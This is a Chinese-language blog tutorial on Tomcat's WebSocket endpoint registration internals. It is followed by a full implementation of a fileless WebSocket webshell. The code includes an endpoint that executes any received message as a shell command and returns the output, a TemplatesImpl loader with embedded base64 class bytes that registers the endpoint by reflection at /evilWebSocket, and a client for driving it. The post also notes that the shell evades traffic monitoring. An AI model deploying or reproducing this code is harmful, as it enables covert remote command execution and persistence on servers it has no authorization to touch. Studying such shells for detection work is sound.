import javax.websocket.OnMessage;
import javax.websocket.OnOpen;
import javax.websocket.Session;
import javax.websocket.server.ServerEndpoint;

@ServerEndpoint("/hello-websocket")
public class HelloWebSocket {
    @OnOpen
    public void onOpen(Session session) {
        System.out.println("连接建立:" + session.getId());
    }

    @OnMessage
    public void onMessage(String msg, Session session) {
        System.out.println("收到消息:" + msg);
        session.getAsyncRemote().sendText("你发送了:" + msg);
    }

    @OnClose
    public void onClose(Session session) {
        System.out.println("连接关闭:" + session.getId());
    }

    @OnError
    public void onError(Session session, Throwable throwable) {
        throwable.printStackTrace();
    }
}
客户端

@ClientEndpoint
public class ChatClient {

    @OnOpen
    public void onOpen(Session session) {
        System.out.println("客户端连接成功");
        session.getAsyncRemote().sendText("你好服务端!");
    }

    @OnMessage
    public void onMessage(String message) {
        System.out.println("收到服务器消息: " + message);
    }

    @OnClose
    public void onClose(Session session) {
        System.out.println("客户端连接关闭");
    }

    @OnError
    public void onError(Throwable throwable) {
        throwable.printStackTrace();
    }
}

用WebSocketContainer.connectToServer进行连接

WebSocketContainer container = ContainerProvider.getWebSocketContainer();
Session session = container.connectToServer(ChatClient.class, URI.create("ws://localhost:8080/hello-websocket"));

其中@OnOpen,@OnMessage,@OnClose,@OnError的功能相信大家都能理解

手动实现

可以手动实现@ServerEndpoint的功能,那么该注解的功能是什么呢?

GPT问一下非springboot项目如何调试@ServerEndpoint注册过程,知道在WsSci.onStartup()中开始注册被@ServerEndpoint注解装饰的类

关于整个SCI的过程,其实得从SPI说起。详情:SnakeYaml反序列化分析 | Godown_blog

简单来说,SPI就是在运行时从 META-INF/services/ 目录下指定的配置文件中加载实现类。

Tomcat启动时,会使用SPI扫描所有JAR

ServletContainerInitializer就满足SPI的条件,作为配置文件,指定初始化时加载WsSci

看到WsSci,@HandlesTypes({ServerEndpoint.class, ServerApplicationConfig.class, Endpoint.class}) 用于标注一个 ServletContainerInitializer(SCI) 实现类,告诉 Servlet 容器:

“启动时请帮我收集所有继承了 ServerEndpoint、ServerApplicationConfig、Endpoint 的类,我需要用它们来完成 WebSocket 的初始化配置。”

@HandlesTypes 是 Servlet 3.0 中引入的注解,标记在实现了 ServletContainerInitializer 的类上,容器会根据你指定的类型自动收集相关类,并作为参数传入 onStartup() 方法。

一句话说来,SCI就是 Servlet 3.0 引入的一种机制,容器在部署时会扫描 META-INF/services/ServletContainerInitializer,加载并执行其中定义类的 onStartup() 方法,实现动态组件注册。

从代码上来说,Tomcat启动时,LifecycleBase.start会调用startInternal()

startInternal方法会循环调用initializers(也就是META-INF/services/ServletContainerInitializer)内类的onStartup方法

在WsSci#OnStartup方法上打上断点

首先调用了init方法

初始化WsServerContainer并返回

回到OnStartup,对SCI收集到所有继承了 ServerEndpoint、ServerApplicationConfig、Endpoint 的类作为参数clazzes,对这个参数进行一个遍历

里面就有自定义的HelloWebSocket

循环的主要功能是遍历传入的类集合 clazzes,并对每个类进行分类和过滤。下图后面三个循环分别是:

  • 如果类实现了 ServerApplicationConfig 接口,则实例化该类并添加到 serverApplicationConfigs 集合中。

  • 如果类继承了 Endpoint 类,则将其添加到 scannedEndpointClazzes 集合中。

  • 如果类标注了 @ServerEndpoint 注解,则将其添加到 scannedPojoEndpoints 集合中。

循环结束后,if块调用了把scannedPojoEndpoints添加到filteredPojoEndpoints,else块是针对上面类继承Endpoint的处理。

什么情况会走到else块呢?

如下利用实现ServerApplicationConfig,自定义决定注册哪些Endpoint

public class MyServerAppConfig implements ServerApplicationConfig {
    @Override
    public Set<ServerEndpointConfig> getEndpointConfigs(Set<Class<? extends Endpoint>> scanned) {
        // 可以根据条件动态决定注册哪些Endpoint
        return Collections.emptySet(); // 不注册任何程序化 Endpoint
    }

    @Override
    public Set<Class<?>> getAnnotatedEndpointClasses(Set<Class<?>> scanned) {
        Set<Class<?>> result = new HashSet<>();
        for (Class<?> clazz : scanned) {
            if (clazz.getName().contains("MyWebSocket")) {
                result.add(clazz); // 只注册类名包含 MyWebSocket 的 Endpoint
            }
        }
        return result;
    }
}

getEndpointConfigs(...):用于注册程序化配置的 Endpoint(继承自 jakarta.websocket.Endpoint)。

getAnnotatedEndpointClasses(...):用于筛选哪些带有 @ServerEndpoint 注解的类要被注册。

WsSci也指定了收集该类的子类

这样就会在else块内就会调用getEndpointConfigs和getAnnotatedEndpointClasses去做对应的注册。相当于一个WebSocket筛选器

之后循环对filteredPojoEndpoint调用WsServerContainer.addEndpoint,跟进该方法

WsServerContainer.addEndpoint方法内首先是检查传入的类是否有ServerEndpoint注解,所以我们手动注册WebSocket内存马肯定是不能直接调用WsServerContainer.addEndpoint的

接着调用了ServerEndpointConfig.Builder.create().build(),可以看到参数是HelloWebSocket和value写的映射路径/hello-websocket

至于后面跟的decoders,encoders,subprotocols,configurator,是因为ServerEndpoint还有一些扩展使用,如下。但是这一块我们无需关注

@ServerEndpoint(value = "/ws/{userId}", encoders = {MessageEncoder.class}, decoders = {MessageDecoder.class}, configurator = MyServerConfigurator.class)

在调用完create().build()后,调用了另一个参数类型的WsServerContainer.addEndpoint(ServerEndpointConfig sec, boolean fromAnnotatedPojo)

WsServerContainer共有四个addEndpoint,注意参数的区别

该addEndpoint内没有了对注解的判断,所以是能直接用的

由上面的分析可知,理论上,假如是通过继承Endpoint实现的ServerEndpoint,则必须通过经过serverApplicationConfigs的筛选才能注册进filteredEndpointConfigs

但是直接调用最后的addEndpoint,则完全不用管serverApplicationConfigs

内存马实现

因为是手动调用WsServerContainer.addEndpoint(ServerEndpointConfig sec, boolean fromAnnotatedPojo),如何获取WsServerContainer呢?

还记得WsSci.init吗,初始化WsServerContainer后调用StandardContext.setAttribute装到到键名为javax.websocket.server.ServerContainer中

用getAttribute能从StandardContext取出,java中获取StandardContext的方法见:Tomcat下获取StandardContext的方法(JSP转Java内存马) | Godown_blog

当然也可以通过StandardContext->ApplicationContext->attributes反射取出

java-object-searcher从线程中也是从StandardContext中找到的WsServerContainer:

好像只有这一种方式取到WsServerContainer了

WebSocket内存马的实现过程如下,依旧通过defineClass加载字节码:

  1. 获取StandardContext,进而获取WsServerContainer

  1. 用ServerEndpointConfig.Builder.create().build()创建恶意ServerWebSocket,用addEndpint添加进WsServerContainer

  1. 需要一个相适配的ClientWebSocket去连接

注意继承Endpoint实现的恶意ServerWebSocket,重写onMessage需要实现MessageHandler.Whole<String>,至于为什么是重写onMessage各位肯定知道

先制作一个恶意的EvilServerWebSocket:

package org.example.tomcatmemshell.WebSocket;

import javax.websocket.Endpoint;
import javax.websocket.EndpointConfig;
import javax.websocket.MessageHandler;
import javax.websocket.Session;
import java.io.IOException;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;

public class EvilServerWebSocket extends Endpoint implements MessageHandler.Whole<String> {
    public static void main(String[] args) throws IOException {
        byte[] string = Base64.getEncoder().encode(Files.readAllBytes(Paths.get("target/classes/org/example/tomcatmemshell/WebSocket/EvilServerWebSocket.class")));
        System.out.println(new String(string));
    }
    private Session session;
    @Override
    public void onOpen(Session session, EndpointConfig config) {
        this.session = session;
        this.session.addMessageHandler(this);
    }
    @Override
    public void onMessage(String message) {
        try {
            Process process;
            String[] cmds = !System.getProperty("os.name").toLowerCase().contains("win") ? new String[]{"sh", "-c", message} : new String[]{"cmd.exe", "/c", message};
            process = Runtime.getRuntime().exec(cmds);
            InputStream inputStream = process.getInputStream();
            StringBuilder stringBuilder = new StringBuilder();
            int i;
            while ((i = inputStream.read()) != -1)
                stringBuilder.append((char)i);
            inputStream.close();
            process.waitFor();
            session.getBasicRemote().sendText(stringBuilder.toString());
        } catch (IOException e) {
            e.printStackTrace();
        } catch (InterruptedException e) {
            throw new RuntimeException(e);
        }
    }
}

然后用TemplatesImpl去注册上面的EvilServerWebSocket,注意这里测试,在上面的代码生成完base64码后注释掉,不然会报 loader (instance of org/apache/catalina/loader/ParallelWebappClassLoader): attempted duplicate class definition重复加载类

package org.example.tomcatmemshell.WebSocket;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.apache.catalina.Context;
import org.apache.catalina.WebResourceRoot;
import org.apache.catalina.core.StandardContext;
import org.apache.catalina.loader.WebappClassLoaderBase;
import org.apache.tomcat.util.net.NioEndpoint;
import org.apache.tomcat.websocket.server.WsServerContainer;

import javax.websocket.DeploymentException;
import javax.websocket.server.ServerEndpointConfig;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.Base64;
import java.util.concurrent.*;

public class WebSocketMemShell extends AbstractTranslet {
    public WebSocketMemShell() {
        try{
            byte[] classBytes = Base64.getDecoder().decode("yv66vgAAADQAygoAKQBfCgBgAGEIAGIHAGMKAGQAZQoAZgBnCgBoAGkJAGoAawoABABsCgBtAG4JACgAbwsAcABxCAByCgBqAHMKAAQAdAgAdQoABAB2CAB3CAB4CAB5CAB6CgB7AHwKAHsAfQoAfgB/BwCACgAZAF8KAIEAggoAGQCDCgCBAIQKAH4AhQsAcACGCgAZAIcLAIgAiQcAigoAIgCLBwCMBwCNCgAlAI4KACgAjwcAkAcAkQcAkwEAB3Nlc3Npb24BABlMamF2YXgvd2Vic29ja2V0L1Nlc3Npb247AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBADpMb3JnL2V4YW1wbGUvdG9tY2F0bWVtc2hlbGwvV2ViU29ja2V0L0V2aWxTZXJ2ZXJXZWJTb2NrZXQ7AQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEABnN0cmluZwEAAltCAQAKRXhjZXB0aW9ucwEABm9uT3BlbgEAPChMamF2YXgvd2Vic29ja2V0L1Nlc3Npb247TGphdmF4L3dlYnNvY2tldC9FbmRwb2ludENvbmZpZzspVgEABmNvbmZpZwEAIExqYXZheC93ZWJzb2NrZXQvRW5kcG9pbnRDb25maWc7AQAJb25NZXNzYWdlAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAHcHJvY2VzcwEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAARjbWRzAQALaW5wdXRTdHJlYW0BABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAA1zdHJpbmdCdWlsZGVyAQAZTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEAAWkBAAFJAQABZQEAFUxqYXZhL2lvL0lPRXhjZXB0aW9uOwEAIExqYXZhL2xhbmcvSW50ZXJydXB0ZWRFeGNlcHRpb247AQAHbWVzc2FnZQEAEkxqYXZhL2xhbmcvU3RyaW5nOwEADVN0YWNrTWFwVGFibGUHADcHAJAHAGMHAJQHAJUHAIAHAIoHAIwBABUoTGphdmEvbGFuZy9PYmplY3Q7KVYBAAlTaWduYXR1cmUBAAVXaG9sZQEADElubmVyQ2xhc3NlcwEAVExqYXZheC93ZWJzb2NrZXQvRW5kcG9pbnQ7TGphdmF4L3dlYnNvY2tldC9NZXNzYWdlSGFuZGxlciRXaG9sZTxMamF2YS9sYW5nL1N0cmluZzs+OwEAClNvdXJjZUZpbGUBABhFdmlsU2VydmVyV2ViU29ja2V0LmphdmEMAC0ALgcAlgwAlwCZAQBNdGFyZ2V0L2NsYXNzZXMvb3JnL2V4YW1wbGUvdG9tY2F0bWVtc2hlbGwvV2ViU29ja2V0L0V2aWxTZXJ2ZXJXZWJTb2NrZXQuY2xhc3MBABBqYXZhL2xhbmcvU3RyaW5nBwCaDACbAJwHAJ0MAJ4AnwcAoAwAoQCiBwCjDACkAKUMAC0ApgcApwwAqABADAArACwHAKkMAKoAqwEAB29zLm5hbWUMAKwArQwArgCvAQADd2luDACwALEBAAJzaAEAAi1jAQAHY21kLmV4ZQEAAi9jBwCyDACzALQMALUAtgcAlAwAtwC4AQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIHAJUMALkAugwAuwC8DAC9AC4MAL4AugwAvwDBDADCAK8HAMQMAMUAQAEAE2phdmEvaW8vSU9FeGNlcHRpb24MAMYALgEAHmphdmEvbGFuZy9JbnRlcnJ1cHRlZEV4Y2VwdGlvbgEAGmphdmEvbGFuZy9SdW50aW1lRXhjZXB0aW9uDAAtAMcMAD8AQAEAOG9yZy9leGFtcGxlL3RvbWNhdG1lbXNoZWxsL1dlYlNvY2tldC9FdmlsU2VydmVyV2ViU29ja2V0AQAYamF2YXgvd2Vic29ja2V0L0VuZHBvaW50BwDIAQAkamF2YXgvd2Vic29ja2V0L01lc3NhZ2VIYW5kbGVyJFdob2xlAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQAQamF2YS91dGlsL0Jhc2U2NAEACmdldEVuY29kZXIBAAdFbmNvZGVyAQAcKClMamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyOwEAE2phdmEvbmlvL2ZpbGUvUGF0aHMBAANnZXQBADsoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9uaW8vZmlsZS9QYXRoOwEAE2phdmEvbmlvL2ZpbGUvRmlsZXMBAAxyZWFkQWxsQnl0ZXMBABgoTGphdmEvbmlvL2ZpbGUvUGF0aDspW0IBABhqYXZhL3V0aWwvQmFzZTY0JEVuY29kZXIBAAZlbmNvZGUBAAYoW0IpW0IBABBqYXZhL2xhbmcvU3lzdGVtAQADb3V0AQAVTGphdmEvaW8vUHJpbnRTdHJlYW07AQAFKFtCKVYBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAF2phdmF4L3dlYnNvY2tldC9TZXNzaW9uAQARYWRkTWVzc2FnZUhhbmRsZXIBACMoTGphdmF4L3dlYnNvY2tldC9NZXNzYWdlSGFuZGxlcjspVgEAC2dldFByb3BlcnR5AQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAAt0b0xvd2VyQ2FzZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAoKFtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBAARyZWFkAQADKClJAQAGYXBwZW5kAQAcKEMpTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEABWNsb3NlAQAHd2FpdEZvcgEADmdldEJhc2ljUmVtb3RlAQAFQmFzaWMBACgoKUxqYXZheC93ZWJzb2NrZXQvUmVtb3RlRW5kcG9pbnQkQmFzaWM7AQAIdG9TdHJpbmcHAMkBACRqYXZheC93ZWJzb2NrZXQvUmVtb3RlRW5kcG9pbnQkQmFzaWMBAAhzZW5kVGV4dAEAD3ByaW50U3RhY2tUcmFjZQEAGChMamF2YS9sYW5nL1Rocm93YWJsZTspVgEAHmphdmF4L3dlYnNvY2tldC9NZXNzYWdlSGFuZGxlcgEAHmphdmF4L3dlYnNvY2tldC9SZW1vdGVFbmRwb2ludAAhACgAKQABACoAAQACACsALAAAAAUAAQAtAC4AAQAvAAAALwABAAEAAAAFKrcAAbEAAAACADAAAAAGAAEAAAANADEAAAAMAAEAAAAFADIAMwAAAAkANAA1AAIALwAAAF4ABAACAAAAIrgAAhIDA70ABLgABbgABrYAB0yyAAi7AARZK7cACbYACrEAAAACADAAAAAOAAMAAAAPABMAEAAhABEAMQAAABYAAgAAACIANgA3AAAAEwAPADgAOQABADoAAAAEAAEAIgABADsAPAABAC8AAABWAAIAAwAAABAqK7UACyq0AAsquQAMAgCxAAAAAgAwAAAADgADAAAAFQAFABYADwAXADEAAAAgAAMAAAAQADIAMwAAAAAAEAArACwAAQAAABAAPQA+AAIAAQA/AEAAAQAvAAABnwAEAAcAAACaEg24AA62AA8SELYAEZoAGAa9AARZAxISU1kEEhNTWQUrU6cAFQa9AARZAxIUU1kEEhVTWQUrU064ABYttgAXTSy2ABg6BLsAGVm3ABo6BRkEtgAbWTYGAp8ADxkFFQaStgAcV6f/6xkEtgAdLLYAHlcqtAALuQAfAQAZBbYAILkAIQIApwAVTSy2ACOnAA1NuwAlWSy3ACa/sQACAAAAhACHACIAAACEAI8AJAADADAAAABCABAAAAAcADgAHQBAAB4ARgAfAE8AIQBbACIAZwAjAGwAJABxACUAhAAqAIcAJgCIACcAjAAqAI8AKACQACkAmQArADEAAABcAAkAQABEAEEAQgACADgATABDADcAAwBGAD4ARABFAAQATwA1AEYARwAFAFcALQBIAEkABgCIAAQASgBLAAIAkAAJAEoATAACAAAAmgAyADMAAAAAAJoATQBOAAEATwAAADkAByVRBwBQ/wAXAAYHAFEHAFIHAFMHAFAHAFQHAFUAAPwAFwH/AB8AAgcAUQcAUgABBwBWRwcAVwkQQQA/AFgAAQAvAAAAMwACAAIAAAAJKivAAAS2ACexAAAAAgAwAAAABgABAAAADQAxAAAADAABAAAACQAyADMAAAADAFkAAAACAFwAXQAAAAIAXgBbAAAAGgADACoAkgBaBgkAaABgAJgACQCIAMMAwAYJ");
//                        ClassLoader classLoader = ClassLoader.getSystemClassLoader();//不能使用,找不到Tomcat下的类,如java.lang.NoClassDefFoundError: org/apache/tomcat/util/threads/ThreadPoolExecutor
            ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
            Method defineClass = ClassLoader.class.getDeclaredMethod(
                    "defineClass", String.class, byte[].class, int.class, int.class
            );
            defineClass.setAccessible(true);
            Class<?> EvilServerWebSocketClass = (Class<?>) defineClass.invoke(classLoader,
                    "org.example.tomcatmemshell.WebSocket.EvilServerWebSocket" , classBytes, 0, classBytes.length
            );
            Object instance = EvilServerWebSocketClass.getDeclaredConstructor().newInstance();
            ServerEndpointConfig serverEndpointConfig = ServerEndpointConfig.Builder.create(EvilServerWebSocketClass,"/evilWebSocket").build();
            StandardContext standardContext = getStandardContext1();
            WsServerContainer wsServerContainer = (WsServerContainer) standardContext.getServletContext().getAttribute("javax.websocket.server.ServerContainer");
            wsServerContainer.addEndpoint(serverEndpointConfig);

        } catch (IllegalAccessException ex) {
            throw new RuntimeException(ex);
        } catch (InvocationTargetException e) {
            throw new RuntimeException(e);
        } catch (NoSuchMethodException e) {
            throw new RuntimeException(e);
        } catch (InstantiationException e) {
            throw new RuntimeException(e);
        } catch (DeploymentException e) {
            throw new RuntimeException(e);
        }
    }
    public static StandardContext getStandardContext1() {
        try{
            WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            Field webappclassLoaderBaseField=Class.forName("org.apache.catalina.loader.WebappClassLoaderBase").getDeclaredField("resources");
            webappclassLoaderBaseField.setAccessible(true);
            WebResourceRoot resources=(WebResourceRoot) webappclassLoaderBaseField.get(webappClassLoaderBase);
            Context StandardContext =  resources.getContext();
            return (StandardContext) StandardContext;
        } catch (NoSuchFieldException e) {
            throw new RuntimeException(e);
        } catch (ClassNotFoundException e) {
            throw new RuntimeException(e);
        } catch (IllegalAccessException e) {
            throw new RuntimeException(e);
        }
    }
    public static Object getClassField(Class clazz,Object object, String fieldName) throws NoSuchFieldException, IllegalAccessException {
        Field field = clazz.getDeclaredField(fieldName);
        field.setAccessible(true);
        Object var =  field.get(object);
        return var;
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

然后用自己做的客户端WebSocketClient去连接

package org.example.tomcatmemshell.WebSocket;

import javax.websocket.*;
import java.net.URI;
import java.util.Scanner;

@ClientEndpoint
public class WebSocketClient {

    @OnOpen
    public void onOpen(Session session) {
        System.out.println("✅ Connected to server");
    }

    @OnMessage
    public void onMessage(String message) {
        System.out.println("📥 Received: " + message);
    }

    @OnClose
    public void onClose(Session session, CloseReason reason) {
        System.out.println("❌ Connection closed: " + reason);
    }

    @OnError
    public void onError(Session session, Throwable throwable) {
        System.out.println("⚠️ Error: " + throwable.getMessage());
    }

    public static void main(String[] args) {
        String uri = "ws://127.0.0.1:8080/TomcatMemshell_war_exploded/evilWebSocket";

        try {
            WebSocketContainer container = ContainerProvider.getWebSocketContainer();
            Session session = container.connectToServer(WebSocketClient.class, new URI(uri));

            // 控制台输入发送消息
            Scanner scanner = new Scanner(System.in);
            while (true) {
                System.out.print("📤 Send: ");
                String msg = scanner.nextLine();
                if ("exit".equalsIgnoreCase(msg)) break;
                session.getAsyncRemote().sendText(msg);
            }

            session.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

演示一波功能:

大佬已经做了一整套webSocket内存马利用开源工具了:

https://github.com/veo/wsMemShell/tree/main

这种内存马很明显有个好处,就是新开ws TCP通道,很多防护设备可能检测不到该通道的流量,不过坏处也在于此,新开通道很容易被监测。

初探Upgrade内存(内存系列篇六)
小王的储物间
02-20 474
前面讲解了一个特殊的Tomcat内存-Executor内存,这篇同样是一个特殊,可以不被检测到的内存-Upgrade内存。这篇就是内存系列文章的第六篇了。Processor是一个接口,针对于不同协议下具有不同的具体实现类,其实现类的具体功能是处理http请求,主要是对协议进行解析,状态处理以及响应。然后起一个中间作用转发到Adater。首先来看一下实现关系类。好了,第六篇系列文章也就结束了,这篇和上一篇同样可以一定程度上绕过Filter鉴权机制导致内存不可用的情况。
浅析Tomcat架构上的Valve内存(内存系列篇十一)
ALLEN'Blog
02-27 660
这篇也是在Tomcat容器上面构造的内存(收回之前说的不搞Tomcat了),这是建立在Tomcat的管道上面做文章的一个内存的实现方式。这是内存系列的第十一篇文章了。根据前面Tomcat架构的相关知识,我们是知道对于Tomcat中的Container层有四个容器:EngineHostContextWrapper四个容器的具体实现为。四个容器中都包含有自己的管道对象,管道对象用来存放若干阀门对象。Tomcat为其分别制定了一个默认的基础阀门。
擅长捉弄的内存同学:Valve内存
顶峰
03-02 520
内存的文章已经很久没有更新过了,这篇文章不太适合想直接学习利用Valve内存的师傅,因为我这篇文章可能会有大篇笔墨去说Tomcat容器,至于原因就是我想更深入的了解一些Tomcat,而Valve内存属于已经被师傅们玩烂了的一种方式,并且Valve内存的实现如果看过之前我写的内存文章这个内存实现起来并不难。所以与其说这篇文章是讲Valve内存,不如说是我学习Tomcat的个人总结,废话也不多说,我们直接开始吧。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。
蓝队技能-应急响应篇&Web内存查杀&Spring框架型&中间件型&JVM分析&Class提取
SuperherRo的博客
09-26 1592
1、应急响应-Web框架内存-分析&清除 2、应急响应-Web中间件内存-分析&清除
基于netty实现websocket高并发服务
热门推荐
zk1z23456789的博客
05-28 5万+
1.WebScoket简述 WebSocket是一种在单个TCP连接上进行全双工通信的协议。 WebSocket使得客户端和服务器之间的数据交换变得更加简单,允许服务端主动向客户端推送数据。在WebSocket API中,浏览器和服务器只需要完成一次握手,两者之间就直接可以创建持久性的连接,并进行双向数据传输。 websocket协议本身是构建在http协议之上的升级协议,客户端首先向服务...
(五)Tomcat源码阅读:Connector组件分析
weixin_55229531的博客
03-25 4万+
(1)属性这里引出了Endpoint这个类,但是我们在这里无需深究,我们只需要知道一个Handler对应一个Endpoint即可,具体的我们会在下面详细介绍。这里又引出了一个类Processor,我们打开注释知道了Processor是在Handler之内的,具体的我们会在下面详细介绍。这里我们知道了Adapter 是连接Handler和connector的桥梁,而且根据之前的注释知道了Adapter还是servlet的容器。/***/(2)方法。
解决Spring Boot WebSocket (StandardWebSocketClient)代理连接时的证书问题
ouzengqi2010的专栏
07-16 1505
*** 开启WebSocket*/@Bean/*** 标准的客户端,并跳过证书* @return*/@Beantry {// 跳过证书// 忽略。
tomcat】5、源码解析
努力充实,远方可期
01-23 1880
会尽快整理 一、编译源码 去官网下载src源码包source code distributions 解压zip压缩包 修改home 进入解压目录,并创建一个目录,命名为home , 并将conf、webapps目录移入home 目录中 pom 在当前目录下创建一个 pom.xml 文件,引入tomcat的依赖包 <?xml version="1.0" encoding="UTF‐8"?> <project xmlns="http://maven.apache.org/POM/4.0.0"
WebSocket使用实例及集成原理
Armyyyyy丶的博客
07-07 716
目录 一、概述 1.简介 2.优点 二、WebSocket请求数据格式 1.request请求数据格式 2.response相应数据格式 三、spring集成实例 1.jar包 2.前端页面 3.后台代码 四、集成原理 1.Tomcat请求流程 2.切入点ServerEndpointExporter类 3.创建连接及发送消息等原理 3.1 创建连接 3.2 发送消息 3.3 关闭和抛异常 一、概述 1.简介 WebSocket是一种在单个TCP连接上进行全双工通信的协
springboot整合websocket异常集合
zsx18273117003的博客
12-15 4130
环境背景:JDK13、IDEA2019.2.4、maven3.6.1、springboot2.2.1.RELEASE、 异常一:java.lang.IllegalStateException: No suitable default RequestUpgradeStrategy found 异常背景:启动主程序时报错 异常详情: E:\jdk\jdk-13.0.1\bin\java.ex...
7 Tomcat分析
青葱暖咖啡
01-17 315
7 Tomcat分析 7.1.1 Tomcat的顶层结构 Tomcat中最顶层的容器叫Server,代表整个服务器,Server中包含至少一个Service,用于具体提供服务。Service主要包含两部分:Connector和Container。Connector用于处理连接相关的事情,并提供Socket与request、response的转换,Container用于封装和管理Servlet,以及...
docker GitLab-runner CI/CD持续集成
奋斗的小鸟专栏
07-22 3144
docker安装GitLab-runnerdocker安装GitLab-runner拉取镜像创建挂载目录启动容器注册gitlab-runner修改Runner配置文件创建SpringBoot项目测试CICD项目结构配置docker注册runner修改config.toml挂载目录修改项目pom.xml,引入docker插件在项目根目录创建Dockerfile文件提交代码到gitlab查看打包结果安装错误ERROR: Failed to load config stat /etc/gitlab-runner/
WebSocket基础与应用场景】:如何使用Spring Boot构建聊天应用
WebSocket技术是实现全双工通信的网络协议,为实时数据交互提供了基础。本文首先概述了WebSocket技术及其协议的核心机制,包括长连接的建立与维护,数据帧的结构与分片。文章深入分析了WebSocket与HTTP协议的关系,...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8677
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全零基础培训 L1-3 Kali命令基础
2401_86544210的博客
04-17 1215
Nmap(端口扫描器)Wireshark(数据包分析器)(应用于对无线局域网进行渗透测试的软件)(密码破解器)Nessus(很强大的漏洞扫描工具)OpenVAS(开源的漏洞扫描工具)Burp Suite(用于web应用安全测试的集成平台)SQLmap自动化的SQL注入工具wireshark网络协议分析工具(kali预装的这些软件包含了很多黑客会使用到的很多工具,但是不要用这些工具去私自攻击未授权的一些网站)
系统与网络安全------弹性交换网络(1)
这里是Y.lin的博客,你好,很高兴云里相遇!希望能给你提供一点帮助
04-16 637
Trunk链路通过802.1Q协议在单条物理链路上传递多个VLAN数据。交换机为数据帧插入VLAN标签(Tag),接收方根据标签识别VLAN并转发。Native VLAN(默认VLAN 1)的帧不标记,两端需一致。
AI重塑网络安全:机遇与威胁并存的“双刃剑”时代
2403_86962125的博客
04-21 275
AI正在重塑网络安全的“攻守天平”。面对AI赋能的攻击者,企业需抛弃“静态防御”思维,构建智能化、动态化的安全体系。唯有将技术创新、管理升级与生态协同结合,方能在这场“AI攻防赛跑”中占据先机。扩展阅读推荐《2024年中国网络安全报告》(瑞星)《人工智能安全白皮书》(奇安信)MITRE ATT&CK攻防技术框架希望这篇内容能帮助读者全面理解AI与网络安全的博弈关系!如需进一步探讨技术细节,欢迎评论区交流。
安恒web安全春招实战
最新发布
persist213的博客
04-24 599
以下是一份涵盖XSS/SSRF漏洞场景复现与绕过技术的模拟面试题目及参考答案,分三个维度:基础原理与防御机制、实战场景复现和高级绕过思路。《网安面试指南》5000篇网安资料库。
计算机网络中科大 - 第7章 网络安全(详细解析)-以及案例
专研计算机网络,数据通信,网络安全,系统集成
04-16 1193
核心技术说明加密算法认证机制Nonce、防重放攻击、数字签名报文完整性哈希算法、MAC、数字签名密钥管理KDC、CA、证书链网络安全措施防火墙、IDS、ACL、分组过滤实践协议攻击防御窃听、重放、IP欺骗、DoS及其防范措施。
那我为什么直接用浏览器/webapi/websocket/regulatory/monitoring就能成功,尝试使用静态路径配置使用nginx proxy_pass http://127.0.0.1:40330/webapi/websocket/regulatory/monitoring; 就是失败
03-08
